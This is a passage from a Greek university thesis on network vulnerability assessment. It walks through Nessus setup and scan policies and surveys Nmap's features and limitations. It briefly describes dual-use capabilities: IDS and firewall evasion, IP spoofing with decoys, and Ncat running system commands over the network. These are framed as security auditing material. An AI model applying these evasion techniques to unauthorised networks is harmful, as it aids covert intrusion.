Εικόνα 4.16: Τρόπος λειτουργίας του Nessus

Page 162: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

162 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Από την κονσόλα του Nessus server γίνεται η ενημέρωση των Plugins και η διαχείριση των

χρηστών. Μόλις γίνει η εκκίνησή του μπορεί να συνδεθούν οι clients. Ο Nessus server

εκτελείται στο τοπικά (127.0.0.1) και περιμένοντας συνδέσεις στη θύρα 1241.

Εικόνα 4.17: Κονσόλα του Server Nessus

Για τη σύνδεση του γραφικού περιβάλλοντος του Nessus χρησιμοποιείται ένας

φυλλομετρητής ιστούς π.χ. Internet Explorer, Mozilla Firefox, κλπ., πληκτρολογώντας στη

περιοχή διευθύνσεων https://127.0.0.1:8834. Κατά την πρώτη σύνδεση ο φυλλομετρητής

εμφανίζει μηνύματα σφάλματος εξαιτίας του self-signed SSL61 πιστοποιητικού. Ο χρήστης

αν χρησιμοποιεί Microsoft Internet Explorer μπορεί να συνεχίσει επιλέγοντας “Continue to

this website (not recommended)”, ενώ οι χρήστες του Firefox 3.x επιλέγοντας “I Understand

the Risks” και μετά “Add Exception…”. Στην επόμενη οθόνη ο χρήστης πληκτρολογεί το

όνομα χρήστη και το συνθηματικό του και συνδέεται στο γραφικό περιβάλλον από όπου

μπορεί να κάνεις τις επιλογές των ελέγχων .

Εικόνα 4.18: Είσοδος στο Nessus client

61 Πιστοποιητικό ταυτότητας που φέρει την υπογραφή του δημιουργού του

Page 163: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

163 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.19: Γραφικό περιβάλλον του Nessus client

Προκειμένου να διενεργηθεί μια σάρωση για ανίχνευση ευπαθειών απαιτείται να καθοριστεί

πρώτα μια πολιτική ελέγχου. Ό χρήστης έχει τη δυνατότητα να εισάγει μια πολιτική ελέγχου

ή να δημιουργήσει μια νέα πατώντας το πλήκτρο Add.

Εικόνα 4.20: Καθορισμός πολιτικής ελέγχου στο Nessus

Μια πολιτική σχετίζεται με τις επιθυμητές ρυθμίσεις της σάρωσης. Αυτές μπορούν να

αφορούν:

• Παραμέτρους που ελέγχουν τεχνικά θέματα όπως timeouts, αριθμό κόμβων, τύπους

ανίχνευσης θυρών κλπ

Page 164: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

164 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Πιστοποιητικά για τοπική σάρωση (π.χ. Windows, SSH), αυθεντικοποίηση σάρωσης

βάσης δεδομένων Oracle, HTTP, FTP, POP, IMAP ή αυθεντικοποίηση βασισμένη στο

Kerberos.

• Χαρακτηριστικά σάρωσης βασισμένα σε μεμονωμένα plugins ή ομάδες plugins

• Καθορισμός πολιτικής ελέγχων για βάσεις δεδομένων, ρυθμίσεις για την ανίχνευση

υπηρεσιών κλπ

Οι έλεγχοι που διενεργούνται ως προεπιλογή είναι η ακόλουθοι:

• Safe checks (Ασφαλείς έλεγχοι): Απενεργοποιούνται τα plugins που μπορεί να

οδηγήσουν σε άρνηση υπηρεσίας ή σε άλλες παρενέργειες στο σύστημα

• Silent Dependencies (Απόκρυψη εξαρτήσεων): Η λίστα εξαρτήσεων δεν

συμπεριλαμβάνεται στην αναφορά

• TCP Scan: Προσδιορίζονται τα ανοιχτά ports του στόχου

• SNMP Scan: Ανιχνεύονται οι υπηρεσίες SNMP στο στόχο

• Netstat SSH scan: Ελέγχονται οι ανοιχτές θύρες από το τοπικό μηχάνημα. Βασίζεται

στην εντολή netstat η οποία είναι διαθέσιμη μέσω της SSH σύνδεσης με το στόχο

• Netstat WMI scan: Ελέγχονται οι ανοιχτές θύρες από το τοπικό μηχάνημα. Βασίζεται

στην εντολή netstat η οποία είναι διαθέσιμη μέσω της WMI σύνδεσης με το στόχο

• Ping κόμβου: Γίνεται ping στους απομακρυσμένους κόμβους σε πολλαπλές θύρες για να

προσδιοριστεί αν είναι σε λειτουργία

Εκτός από τις παραπάνω επιλογές ο χρήστης έχει τη δυνατότητα να καθορίσει και πια

plugins θα χρησιμοποιηθούν στον εκάστοτε έλεγχο, ενεργοποιώντας ή απενεργοποιώντας τα

από την αντίστοιχη καρτέλα. Η ενεργοποίηση ή απενεργοποίηση εξαρτήσεων μεταξύ των

plugins αποτελεί ουσιαστική επιλογή αφού ένας αριθμός από Nessus plugins εξαρτώνται

από τις πληροφορίες που συλλέγονται από άλλα plugins.

Έχοντας καθορίσει ο χρήστης μια πολιτική ελέγχου, μπορεί να εκκινήσει την ανίχνευση

ευπαθειών στους στόχους που έχει επιλέξει. Τα αποτελέσματα των ελέγχων ασφάλειας

μπο ρεί να τα δει ο χρήστης και κατά το ν χρό νο που η διαδικασία ελέγχο υ βρίσκεται σε

εξέλιξη.

Page 165: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

165 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.21: Διενέργεια ελέγχου με το Nessus

Η αναφορά που παράγεται είναι ιδιαίτερα φιλική προς το χρήστη, αφού τα αποτελέσματα

κατηγοριοποιούνται ανάλογα με το επίπεδο επικινδυνότητάς τους, ενώ παρέχονται και

οδηγίες για την αντιμετώπισή τους

Εικόνα 4.22: Αναφορά του Nessus

Οι Nessus clients υποστηρίζουν έναν πλήθος διαμορφώσεων και τρόπων παρουσίασης

αναφορών των αποτελεσμάτων. Οι περισσότεροι clients υποστηρίζουν την ικανότητα της

εξαγωγής των αποτελεσμάτων σε φιλική προς τον χρήστη HTML μορφή, αλλά παρέχουν και

μία ή περισσότερες αμιγώς Nessus μορφές, όπως η NBE. Κάποιοι clients, επίσης,

Page 166: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

166 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

υποστηρίζουν την δυνατότητα να εξαχθούν αποτελέσματα σε XML, PDF, LaTex ή σε

βάσεις δεδομένων, όπως επίσης, παρέχουν λειτουργίες σύγκρισης αποτελεσμάτων, ώστε να

προκύπτουν χρήσιμα συμπεράσματα από την αντιπαράθεση δύο ή παραπάνω αναφορών.

Για περισσότερες λεπτομέρειες ο αναγνώστης παραπέμπεται στον οδηγό χρήσης του

εργαλείου.

Page 167: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

167 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.9 Nmap

4.9.1 Ταυτότητα Το Nmap (Network Mapper) είναι ένα δωρεάν και ανοικτού κώδικα εργαλείο το οποίο

χρησιμοποιείται για την εξερεύνηση δικτύων ή τον έλεγχο ασφάλειας και είναι διαθέσιμο

μέσω της ιστοσελίδας http://nmap.org/. Πολλά συστήματα και διαχειριστές δικτύων το

βρίσκουν επίσης χρήσιμο και για άλλους λόγους, όπως η χαρτογράφηση δικτύων, τη

διαχείριση του δικτύου και την παρακο λούθηση των κόμβων ή των υπηρεσιών που

εκτελούνται στο δίκτυο.

Το Nmap μπορεί να καθορίσει ποιοι κόμβοι είναι διαθέσιμοι στο δίκτυο, ποιες είναι οι

υπηρεσίες (όνομα και έκδοση εφαρμογής) που παρέχουν οι κόμβους, ποια λειτουργικά

συστήματα (και εκδόσεις OS) εκτελούνται σε αυτούς, ποιος τύπος φίλτρων/αντιπυρικών

ζωνών είναι σε λειτουργία, καθώς και μια πλειάδα άλλων χαρακτηριστικών. Πραγματοποιεί

ανιχνεύσεις τόσο σε μεγάλα δίκτυα, όσο και σε μεμονωμένους κόμβους. Το Nmap

συνεργάζεται με τα περισσότερα λειτουργικά συστήματα, όπως Linux, Solaris, MAC OS Χ,

BSD, Windows και AmigaOS.

Εκτός από την κλασική γραμμή εντολών εκτέλεσης, το Nmap περιλαμβάνει ένα προηγμένο

γραφικό περιβάλλον για την εμφάνιση των αποτελεσμάτων (Zenmap), ένα εργαλείο για την

ευέλικτη μεταφορά δεδομένων, την ανακατεύθυνση και την αποσφαλμάτωση (Ncat), καθώς

και μια χρηστική εφαρμογή για τη σύγκριση των αποτελεσμάτων ανίχνευσης (Ndiff).

Το Nmap δημιο υργήθηκε από ένα ειδικό της ασφαλείας των δικτύων, με το ψευδώνυμο

Fyodor και εμφανίστηκε για πρώτη φορά σαν άρθρο στο περιοδικό Phrack τον Σεπτέμβριο

του 1997, όπου περιλαμβανόταν και ο πηγαίος κώδικας. Από τότε, το Nmap αναπτύσσεται

διαρκώς από τον Fyodor, αλλά κυρίως από την ενεργή κοινότητα των χρηστών του, οι

οποίοι, προσπαθώντας να ικανοποιήσουν τις ιδιαίτερες απαιτήσεις τους και

εκμεταλλευόμενοι τον ανοικτό κώδικα, προσθέτουν συνεχώς λειτουργίες, πρωτόκολλα

κ.λ.π, βελτιώνοντας παράλληλα το πρόγραμμα. Μ’ αυτόν τον τρόπο το Nmap φτάνοντας

στην τρέχουσα έκδοση 5.00 περιλαμβάνει πιο εξελιγμένους αλγόριθμους προσδιορισμού

των υπηρεσιών που είναι διαθέσιμες, κώδικα πο υ έχει γραφεί εκ νέο υ (από C σε C++),

καθώς και περισσότερους τρόπους ανίχνευσης θυρών και περισσότερα υποστηριζόμενα

πρωτόκολλα (όπως το IPv6).

Page 168: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

168 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Τα πλεονεκτήματα που διαθέτει το Nmap τα οποία το κάνουν να ξεχωρίζει μπορούν να

συνοψιστούν στα παρακάτω:

• Ευελιξία: υποστηρίζει μια πλειάδα από προχωρημένες τεχνικές χαρτογράφησης του

δικτύου παρακάμπτοντας φίλτρα IP, αναχώματα ασφάλειας, δρομολογητές και άλλες

κατηγορίες εμποδίων. Οι τεχνικές ανίχνευσης θυρών (όπως TCP & UDP) που

χρησιμοποιεί είναι πάρα πολλές, μεταξύ των οποίων είναι ο εντοπισμός του λειτουργικού

συστήματος και της έκδοσης του.

• Αποτελεσματικότητα: Το Nmap έχει χρησιμοποιηθεί σε εκατοντάδες χιλιάδες

μηχανήματα για την ανάλυση τόσο μικρών, όσο και μεγάλων αρχιτεκτονικά δικτύων.

• Συμβατότητα: Τα περισσότερα λειτουργικά συστήματα μπορούν να συνεργαστούν με

αυτό το πρόγραμμα όπως τα Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris,

IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, και άλλα.

• Ευχρηστία: Το Nmap, αν και προσφέρει μια μεγάλη γκάμα από εντολές, παραμένει

εύχρηστο και για τους πιο αρχάριους χρήστες του. Παράλληλα, υποστηρίζεται από

αρκετά περιβάλλοντα γραφικής απεικόνισης (GUI) για την διευκόλυνση του χρήστη.

• Δωρεάν διάθεση: Ο πρωταρχικός στόχος στο Project του Nmap είναι να βοηθήσει το

διαδίκτυο να γίνει πιο ασφαλές, καθώς και να διευκολύνει τους διαχειριστές να

αναλύσουν το δίκτυο τους. Γι’ αυτούς τους λόγους το πρόγραμμα διατίθεται δωρεάν

κάτω από την άδεια χρήσης GPL.

• Τεκμηρίωση: Ο ιστότοπος του Nmap προσφέρει αναλυτική τεκμηρίωση για το

πρόγραμμα, ενώ επιπλέον υποστηρίζεται βιβλιογραφικά σε διάφορες γλώσσες.

• Υποστήριξη: Παρά το γεγονό ς ό τι το Nmap δεν φέρει εγγύηση προϊόντος, σαν

πρόγραμμα υποστηρίζεται από την κοινότητα του σε περιπτώσεις εμφάνισης σφαλμάτων.

• Δημοτικότητα: Χιλιάδες χρήστες κατεβάζουν το Nmap καθημερινά, ενώ

ενσωματώνεται σε πολλές εκδόσεις λειτουργικών συστημάτων και εργαλείων

αξιολόγησης τρωτών σημείων σε πληροφοριακά συστήματα. Τέτοια λειτουργικά είναι τα

Redhat Linux, Debian Linux, Gentoo, FreeBSD και OpenBSD.

4.9.2 Δυνατότητες

Το Nmap διαθέτει τις ακόλουθες δυνατότητες:

• Ανίχνευση Κόμβων: Αναγνώριση υπολογιστών σε ένα δίκτυο ανακαλύπτοντας τους

υπολογιστές που αποκρίνονται στα pings ή έχουν κάποια συγκεκριμένη δικτυακή θύρα

ανοιχτή.

Page 169: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

169 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Σάρωση θυρών: Βρίσκει όλες τις ανοιχτές δικτυακές θύρες σε ένα ή περισσότερους

υπολογιστές – στόχους.

• Προσδιορισμός έκδοσης: Με ερώτηση σε δικτυακές υπηρεσίες που βρίσκονται σε

ακρόαση στους υπολογιστές – στόχους, προκειμένου να προσδιοριστεί το όνομα της

εφαρμογής και η έκδοση της.

• Προσδιορισμός Λειτουργικού Συστήματος: Προσδιορισμός του λειτουργικού

συστήματος ενός υπολογιστή, καθώς και των χαρακτηριστικών των συσκευών του

δικτύου (π.χ. MAC Address, routers, κλπ)

• Καταγραφή των αποτελεσμάτων ανίχνευσης: Δημιουργία αρχείων με τα αποτελέσματα

των ανιχνεύσεων σε πολλές μορφές όπως αναγνώσιμη μορφή, XML μορφή, μορφή

αναγνωρίσιμη από άλλα προγράμματα κ.λ.π

• Δυναμικός υπολογισμός του χρόνου καθυστέρησης αποστολής πακέτων: Το Nmap

υπολογίζει και τροποποιεί κατά την εκτέλεση, τον χρόνο καθυστέρησης που πρέπει να

μεσολαβήσει στην αποστολή δυο διαδοχικών πακέτων. Στόχος είναι η αποφυγή του

κατακλυσμού του δικτύου με άχρηστα πακέτα. Ο χρόνος καθυστέρησης μπορεί να

ρυθμιστεί και από τον χρήστη.

• Επανεκπομπή: Το Nmap διαθέτει ρύθμιση για τον αριθμό των επανεκπομπών πακέτων

για πόρτες που δεν αποκρίνονται.

• Παράλληλη σάρωση θυρών: Το Nmap χρησιμοποιεί non-blocking i/o και παράλληλη

ανίχνευση θυρών σε όλες τις TCP, UDP μεθόδους.

• Ευέλικτος προσδιορισμός θυρών: Επειδή δεν χρειάζεται πάντα να ελέγχονται και οι

65535 πόρτες, το Nmap επιτρέπει τον καθορισμό των θυρών προς ανίχνευση με πολύ

ευέλικτο τρόπο. (π.χ -p 21-25,80,113,60000-‘).

• Ευέλικτος προσδιορισμός στόχου: Όπως παραπάνω υποστηρίζεται ο καθορισμός του

εύρους των IP’s που ενδιαφέρουν, με πολύ ευέλικτο τρόπο. (π.χ 150.12.17.71-79 ή

150.*.17.*) κ.λ.π

• Ανίχνευση των Down Κόμβους: Για να μην χάνεται χρόνος προκειμένου να ελεγχθούν

όλες οι θύρες ενός υπολογιστή που δεν είναι ενεργός το Nmap κάνει πρώτα ping σε

όλους τους κόμβους και στη συνέχεια ανιχνεύει μόνο όσους απάντησαν στο ping.

• Ανίχνευση της διεύθυνσης ΙΡ από την οποία εκτελείται: Το Nmap ανιχνεύει τη

διεύθυνση IP του υπολογιστή στον οποίο “τρέχει” και έτσι δεν απαιτείται από τον χρήστη

να βρίσκει κάθε φορά αυτή την διεύθυνση. Βεβαίως αυτό μπορεί να ρυθμιστή από τον

χρήστη αν θέλει να φαίνεται ότι κάποιος άλλος κάνει την ανίχνευση.

• Αποφυγή και παραπλάνηση Αναχώματος ασφάλειας/IDS: Κάθε ανίχνευση με το

Nmap μπορεί να προσαρμοστεί έτσι ώστε να μην είναι ορατή από τα αναχώματα

ασφάλειας και τα συστήματα εντοπισμού εισβολών. Το nmap έχει την δυνατότητα να

Page 170: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

170 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

παραποιήσει την ταυτότητα του (IP Address), ακόμη και να δημιουργήσει εικονικά

ταυτόχρονα πολλές ανιχνεύσεις από διαφορετικές διευθύνσεις, έτσι ώστε να είναι

δύσκολος ο εντοπισμός της πραγματικής του διεύθυνσης από όπου και πραγματοποιεί

την ανίχνευση.

• Πλατφόρμα Zenmap: Αποτελεί το γραφικό περιβάλλον του εργαλείου στο οποίο

εμφανίζονται τα αποτελέσματα και υποστηρίζονται όλες οι επιλογές του εργαλείου. Τα

κύρια χαρακτηριστικά της πλατφόρμας Zenmap είναι:

o Επιτρέπει την αποθήκευση των συχνά χρησιμοποιούμενων σαρώσεων ως profiles, για

να διευκολύνει τη επαναληπτική χρήση τους

o Ένας δημιουργός εντολών επιτρέπει την αλληλεπίδραση με τη γραμμή εντολών του

Nmap

o Επιτρέπει την αποθήκευση των αποτελεσμάτων των ανιχνεύσεων για μεταγενέστερη

επεξεργασία τους

o Παρέχει τη δυνατότητα σύγκρισης των αποτελεσμάτων διαφορετικών αποθηκευμένων

σαρώσεων

o Σχεδιάζει την τοπολογία του δικτύου

o Επιτρέπει το συνδυασμό των αποτελεσμάτων πολλών ανιχνεύσεων του Nmap σε μια

• Scripting Engine (NSE): Επιτρέπει στους χρήστες να γράφουν και να μοιράζονται απλά

scripts, τα οποία μπορούν να αυτοματοποιήσουν ένα μεγάλο εύρος δικτυακών ενεργειών.

Αυτά scripts μπορούν στη συνέχεια να εκτελεστούν παράλληλα με ταχύτητα και

αποδοτικότητα.

• Ενσωμάτωση Εργαλείου Ncat: Το Ncat είναι ένα γενικού σκοπού εργαλείο γραμμής

εντολών το οποίο μπορεί να χρησιμοποιηθεί για την ανάγνωση, το γράψιμο, την

ανακατεύθυνση και την κρυπτογράφηση δεδομένων στο δίκτυο. Το εργαλείο αυτό είναι

ιδιαίτερα σημαντικό γιατί μπορεί να συμβάλλει στη διαχείριση ενός μεγάλου εύρους

ελέγχων ασφάλειας και ενεργειών διαχείρισης. Το Ncat μπορεί να:

o δράσει ως απλός client TCP/UDP/SSL για την αλληλεπίδραση με τους servers, τους

telnet servers, τους mail servers, και άλλες υπηρεσίες δικτύου TCP/IP.

o δράσει ως απλός server TCP/UDP/SSL για την παροχή υπηρεσιών στους clients, ή

απλά για να καταλάβει ποιοι από τους υπάρχοντες clients είναι ενεργοί μέσω της

σύλληψης των bytes που στέλνουν.

o ανακατεύθυνση ή proxy TCP/UDP της κυκλοφορίας σε άλλες θύρες ή κόμβους.

o εκτελεστεί στα περισσότερα λειτουργικά συστήματα

o κρυπτογραφήσει την επικοινωνία με SSL, και να τη μεταφέρει πάνω από IPv4 ή IPv6

o δράσει ως πύλη δικτύου για την εκτέλεση των εντολών συστημάτων, με

ανακατεύθυνση I/O στο δίκτυο.

Page 171: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

171 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o δράσει ως ενδιάμεσος σύνδεσης, που επιτρέπει σε δύο (ή περισσότερους) κόμβους να

συνδεθούν μεταξύ τους μέσω ενός τρίτου εξυπηρετητή.

• Βελτιωμένη απόδοση στις λειτουργίες ανίχνευσης κόμβων και σάρωσης θυρών: η

βελτίωση στην απόδοση του Nmap επιτυγχάνεται με:

o Τη σάρωση των περισσότερο χρησιμοποιούμενων 1.000 θυρών ως προεπιλογή σε

κάθε πρωτόκολλο (η σάρωση UDP παραμένει προαιρετική).

o το fast scan (-F) πραγματοποιεί σάρωση στις 100 κορυφαίες θύρες ως προεπιλογή σε

κάθε πρωτόκολλο

o η --top-ports επιλογή επιτρέπει τον προσδιορισμό του αριθμού των θυρών για τις

οποίες είναι επιθυμητή η σάρωση για κάθε πρωτόκολλο

o η --min-rate επιλογή επιτρέπει τον καθορισμό μιας ελάχιστης τιμής στην

αποστολή

o υποστηρίζεται η σάρωση θυρών SCTP (Stream control transmission protocol) η οποία

χρησιμοποιείται κυρίων στις εφαρμογές τηλεφώνου.

• Το εργαλείο σύγκρισης σαρώσεων Ndiff: Η εφαρμογή Ndiff χρησιμοποιείται για τη

σύγκριση των αποτελεσμάτων δύο σαρώσεων του Nmap και την περιγραφή των αλλαγών

στο δίκτυο, δηλαδή την προσθήκη ή αφαίρεση κόμβων, τις νέες θύρες που έχουν ανοίξει

ή κλείσει, αλλαγή λειτουργικού συστήματος ή έκδοσης εφαρμογής, κλπ.

• Τεχνικές σάρωσης: Υπάρχουν περίπου δεκαπέντε διαφορετικές μέθοδοι ανίχνευσης

μέσα στο Nmap, είκοσι διαφορετικές επιλογές να χρησιμοποιηθούν κατά την ανίχνευση

και τα αποτελέσματα του μπορούν να παρουσιαστούν τουλάχιστον με τέσσερις

διαφορετικούς τρόπους. Μέσα σε όλες αυτές τις επιλογές, υπάρχουν επιλογές μεταβολής

συγχρονισμού και καθυστέρησης πακέτων. Αυτές οι επιλογές έχουν ως σκοπό να

παρέχουν την πλήρη προσαρμογή στις ανάγκες έρευνας και χαρτογράφησης του δικτύου

του εκάστοτε χρήστη. Κάθε διαδικασία ανίχνευσης και σάρωσης έχει πλεονεκτήματα και

μειονεκτήματα παράγοντες που πρέπει να γνωρίζει καλά ο χρήστης, ώστε να έχει τα

βέλτιστα αποτελέσματα.

• Διαχείριση συσκευών δικτύου: Το Nmap μπορεί να εντοπίσει, να αναγνωρίσει και να

κατηγοριοποιήσει τις συσκευές του δικτύου διευκολύνοντας το διαχειριστή του όσον

αφορά στις ενέργειες που πρέπει να πραγματοποιήσει σε αυτές.

• Έλεγχοι ασφάλειας: Το Nmap μπορεί να βοηθήσει στον εντοπισμό ευπαθών σημείων

του δικτύου καθώς και στον εντοπισμό προσβολής της ασφάλειάς του. Συγκεκριμένα

μπορεί:

o να ανιχνεύσει ένα δίκτυο εύκολα για να εντοπίσει, ίχνη δράσης spyware, ιών και

άλλων ιομορφικών λογισμικού χρησιμοποιώντας ping μεθόδους, ανιχνεύσεις θυρών

και αντίστροφο DNS έλεγχο.

Page 172: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

172 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o Να διαπιστωθεί αν έχει παρεισφρήσει κάποιος στο τοπικό δίκτυο με φυσικό τρόπο,

ελέγχοντας όλο το subnet. (πχ nmap 192.168.1.1-255, το nmap θα εμφανίσει όλες τις

ενεργές συσκευές στο δίκτυο. Αν κάποια από αυτές είναι άγνωστη τότε πιθανότατα

κάποιος έχει παρεισφρήσει στο δίκτυο)

o Εύκολα να διαπιστώσει αν κάποια λειτουργικά συστήματα έχουν απαρχαιωμένες

εκδόσεις, και χρειάζονται αναβάθμιση (services pack ,patch, κλπ).

o Να ελέγξει το Ανάχωμα Ασφάλειας ως προς την επιτρεπτή κυκλοφορία πακέτων

μέσω αυτού, τις θύρες που είναι ανοιχτές, τα φίλτρα που χρησιμοποιούνται και

τη διατήρηση των ρυθμίσεών του.

o Να εντοπίσει υπηρεσίες που δεν θα έπρεπε να εκτελούνται σε ένα μηχάνημα δικτύου,

και οι οποίες μπορούν να γίνουν στόχος επίδοξων εισβολέων.

o Να ελέγξει για την ύπαρξη μη προστατευμένων με συνθηματικό (anonymous, guest,

κλπ) υπηρεσιών ftp, telnet, vnc, και γενικά υπηρεσιών απομακρυσμένου ελέγχου ή

πρόσβασης αρχείων.

4.9.3 Περιορισμοί και παρενέργειες

Το Nmap εκτός από τα παραπάνω πλεονεκτήματα διαθέτει περιορισμούς και παρενέργειες.

Οι σημαντικότερες από αυτές είναι:

• Η σάρωση από έναν τοπικό υπολογιστή του δικτύου δίνει διαφορετικά αποτελέσματα

από την απομακρυσμένη σάρωση

• Μπορεί να χρησιμοποιηθεί για κακόβουλες ενέργειες

• Πολλές από τις τεχνικές ανίχνευσης που χρησιμοποιεί είναι πολύ “θορυβώδεις” και

καταγράφονται, με αποτέλεσμα να μπορεί να βρεθεί η πηγή της επίθεσης.

• Πολλές από τις τεχνικές ανίχνευσης που χρησιμοποιεί εντοπίζονται και

εξουδετερώνονται από τα σύγχρονα Αναχώματα Ασφάλειας και packet filters.

• Μερικές από τις τεχνικές ανίχνευσης που χρησιμοποιεί, μπορεί να οδηγήσουν σε

κατάρρευση των συστημάτων.

• Ο προσδιορισμός του λειτουργικού συστήματος δεν είναι πάντα ακριβής.

4.9.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το Nmap είναι ένα εργαλείο όπου η αρχιτεκτονική στην οποία στηρίζεται του δίνει την

δυνατότητα να στέλνει επεξεργασμένα πακέτα TCP/ IP και να περιμένει την απόκριση τους.

Τα αποτελέσματα συγκρίνονται με μια βάση δεδομένων γνωστών αποτελεσμάτων (βάση

δεδομένων υπογραφών Λειτουργικών Συστημάτων - ΛΣ). Αυτή η βάση δεδομένων είναι ένα

